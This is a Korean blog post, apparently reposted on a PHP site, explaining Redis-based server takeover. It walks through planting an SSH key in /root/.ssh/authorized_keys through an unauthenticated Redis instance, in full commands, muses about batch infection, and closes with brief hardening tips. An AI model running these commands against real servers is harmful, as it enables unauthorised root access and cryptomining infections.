Redis 마이닝의 원리와 예방 방법에 대한 간략한 분석(기술 공유)
Jan 11, 2022 pm 06:49 PM
redis
채광
방지
이 글은 Redis 마이닝의 원리에 대해 이야기하고, 이를 예방하는 방법을 알아보고, 예방 기술을 공유하는 것이 모든 사람에게 도움이 되기를 바랍니다.
저자님도 마이닝 바이러스 공격을 받았는데, 그게 굉장히 불편했지만, 사실 침입 수단을 이해한다면 예방하는 것은 매우 쉽습니다. 오늘은 이를 얻는 방법을 보여드리겠습니다. Redis 권한 상승을 통해 원격 서버의 루트 사용자. [관련 권장 사항: Redis 비디오 튜토리얼]
1. 먼저 몇 가지 전제 조건이 필요합니다
-
조건 1: 먼저 Redis가 있어야 하며 해당 포트를 알아야 합니다. [기본값 6379];
조건 2: Redis의 비밀번호는 너무 복잡하거나 비밀번호가 없습니다. - 조건 3: Redis를 시작하는 사용자는 가급적 파괴적입니다.
- 2. 문제 발생
2.1 비밀 키 쌍 만들기
- ssh-keygen을 통해 쌍을 생성합니다. 물론 이미 가지고 있는 비밀 키를 문제 없이 사용할 수 있습니다.
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
로그인 후 복사
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
로그인 후 복사
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
로그인 후 복사
- 작업은 다음과 같습니다.
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
로그인 후 복사
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
로그인 후 복사
- 다음 작업을 살펴보겠습니다.
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
로그인 후 복사
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w
로그인 후 복사
3. 예방 방법
이 취약점은 매우 강력합니다. 이제 호스트 권한이 하나만 있으므로 일부 스크립트를 실행한 다음 일괄적으로 감염시키는 것은 어떻습니까?
예방 팁은 다음과 같습니다. Redis는 위험한 IP를 수신해서는 안 됩니다. 그렇다면 방화벽 제어를 추가하세요.- Redis는 비밀번호 제한을 강화해야 하며, 이는 취약한 비밀번호가 될 수 없습니다.
- Redis는 루트 사용자로 시작하지 않도록 노력해야 합니다.
- Redis 채굴을 방지하려면 위의 세 가지 사항을 따르세요. 문제 없습니다.더 많은 프로그래밍 관련 지식을 보려면 프로그래밍 소개
위 내용은 Redis 마이닝의 원리와 예방 방법에 대한 간략한 분석(기술 공유)의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

인기 기사
스플릿 소설을이기는 데 얼마나 걸립니까?
3 몇 주 전
By DDD
Repo : 팀원을 부활시키는 방법
3 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌
헬로 키티 아일랜드 어드벤처 : 거대한 씨앗을 얻는 방법
3 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
1 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌

인기 기사
스플릿 소설을이기는 데 얼마나 걸립니까?
3 몇 주 전
By DDD
Repo : 팀원을 부활시키는 방법
3 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌
헬로 키티 아일랜드 어드벤처 : 거대한 씨앗을 얻는 방법
3 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
1 몇 주 전
By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 기사 태그

메모장++7.3.1
사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경

드림위버 CS6
시각적 웹 개발 도구

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

뜨거운 주제
Gmail 이메일의 로그인 입구는 어디에 있나요?
7135
9


자바 튜토리얼
1534
14


라라벨 튜토리얼
1257
25


PHP 튜토리얼
1205
29


Cakephp 튜토리얼
1155
46



Windows 11 10.0.22000.100 설치 시 발생하는 0x80242008 오류 해결 방법

erlang과 golang 중 어느 것이 더 나은 성능을 갖고 있나요?
